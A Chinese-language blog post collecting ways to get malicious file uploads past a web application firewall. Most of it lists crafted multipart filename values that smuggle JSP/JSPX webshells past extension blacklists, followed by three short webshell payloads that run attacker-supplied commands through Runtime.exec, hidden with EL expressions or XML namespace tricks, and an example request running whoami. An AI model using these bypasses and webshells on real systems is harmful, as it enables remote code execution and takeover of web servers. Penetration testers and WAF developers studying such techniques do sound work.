文件上传绕过waf姿势收集

前言

现在渗透测试基本都会遇到waf,有waf就会封ip,有waf就要fuzz,记录一下从网上收集到的常用的文件上传的姿势,不一定能用,说不定下次就遇到了呢。

正文

后缀绕过

白名单基本没戏,洗洗睡吧。记录一下遇到的黑名单绕过。

jsp

  • 1.jpg\.jsp/ 以下内容可以尝试换行试一下
  • filename='shell.jspx.jsp'
  • filename=shell.jspx.jsp
  • filename=shell.jspx.jsp'
  • "filename"=shell.jspx;
  • filename=shell.jpg;filename=shell.jspx;
  • filename=shell.jspx;filename=shell.jpg;
  • FileName=shell.jspx.jsp'
  • FileName=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaashell.jspx.jsp'
  • FileName =shell.jspx(加空格)
  • filename===="shell.jspx.jsp1"(加等号)
  • FileName =shell.jspx
  • FileName=shell.jspx. jsp
  • File Name=shell.jspx.jsp'

内容绕过

jsp利用EL表达式绕过

1
${Runtime.getRuntime().exec(request.getParameter("x"))}

jspx利用命名空间绕过:http://127.0.0.1:8080/test.jsp?ccadmin=whoami,其中bbb可以任意替换

1
2
3
4
5
<bbb:root xmlns:bbb="http://java.sun.com/JSP/Page" version="1.2">
    <bbb:scriptlet>
    Runtime.getRuntime().exec(request.getParameter("ccadmin"));    
</bbb:scriptlet>>
</bbb:root>

jspx利用jsp:expression绕过

1
2
3
4
5
<bbb:root xmlns:bbb="http://java.sun.com/JSP/Page" version="1.2">
    <bbb:expression>
    Runtime.getRuntime().exec(request.getParameter("ccadmin"))
</bbb:expression>
</bbb:root>

参考内容

  • https://xz.aliyun.com/t/10515
  • https://yzddmr6.com/posts/jsp-webshell-upload-bypass/
#waf #bypass
文件上传绕过waf姿势收集
https://blog.njcit.me/2023/03/23/waf_bypass/文件上传/
作者
ccadmin
发布于
2023年3月23日
许可协议